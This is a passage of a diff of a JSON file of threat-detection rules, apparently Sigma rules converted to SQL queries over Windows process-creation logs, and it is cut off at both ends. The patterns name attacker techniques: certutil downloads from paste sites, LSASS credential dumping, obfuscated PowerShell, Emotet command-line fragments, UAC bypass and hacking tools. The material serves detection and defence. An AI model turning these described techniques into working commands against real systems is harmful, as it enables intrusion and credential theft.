File-Sharing Website Via Certutil.EXE", + "id": 
"42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion" - ], - "falsepositives": [ - "Installation of unsigned packages for testing purposes" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" - }, - { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR 
CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Files And Subdirectories Listing Using Dir", - "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "status": "experimental", - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "author": "frack113", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' 
AND CommandLine LIKE '% /b%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_dir_execution.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 
'%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." 
+ "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.persistence" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "status": "experimental", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. 
This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
+ "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", 
- "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when 
running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Usage Of Web Request 
Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", + "attack.persistence", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine 
LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script 
%' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR 
Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": 
